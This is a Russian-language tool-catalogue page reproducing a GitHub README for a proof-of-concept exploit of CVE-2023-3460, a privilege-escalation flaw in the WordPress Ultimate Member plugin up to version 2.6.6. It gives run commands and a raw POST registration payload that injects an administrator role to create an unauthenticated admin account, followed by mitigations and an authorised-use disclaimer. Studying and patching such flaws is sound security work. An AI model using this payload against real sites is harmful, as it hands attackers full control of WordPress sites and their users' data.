Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-3460 | Kitploit
Инструменты/GitHubGitHub/gurjotexpert/cve-2023-3460
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2023-3460 - Эксплойт повышения привилегий в WordPress Ultimate Member

Это эксплойт типа proof-of-concept (PoC) для CVE-2023-3460 — критической уязвимости в плагине WordPress Ultimate Member. Он позволяет неаутентифицированным пользователям повышать свои привилегии до Администратора путем отправки вредоносного запроса на регистрацию.

🔥 Воздействие: Полная компрометация сайта через несанкционированное создание учетной записи администратора.


📌 Детали уязвимости

  • Затронутый плагин: Ultimate Member
  • Затронутые версии: ≤ 2.6.6
  • Исправленная версия: 2.6.7
  • Тип эксплойта: Повышение привилегий через злоупотребление регистрацией
  • Требуется аутентификация: ❌ Нет
  • CVE: CVE-2023-3460

⚙️ Требования

  • Python 3
  • библиотека requests
  • библиотека urllib3
  • библиотека beautifulsoup4

Установка зависимостей:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Использование эксплойта

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Пример:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Возможности скрипта эксплойта

  • Извлекает CSRF-нонс (_wpnonce) со страницы регистрации
  • Обходит валидацию формы
  • Внедряет wp_capabilities с ролью administrator
  • Создает нового пользователя с правами администратора без аутентификации

🔐 Пример payload эксплойта

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Меры защиты

  • Обновите плагин Ultimate Member до версии v2.6.7 или выше
  • Отключите открытую регистрацию, если она не требуется
  • Отслеживайте журналы создания пользователей на предмет подозрительной активности

📚 Ссылки

  • 🔗 Консультация Patchstack
  • 🔗 CVE-2023-3460 на NVD

⚠️ Отказ от ответственности

Этот скрипт предоставляется только для образовательных целей и авторизованного тестирования. Несанкционированная эксплуатация систем незаконна и неэтична. Используйте его только на системах, которыми вы владеете или на тестирование которых получили разрешение.


👨‍💻 Автор

  • 💀 [ГУРДЖОТ СИНГХ]
  • 🔒 [LinkedIn: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Скачать инструмент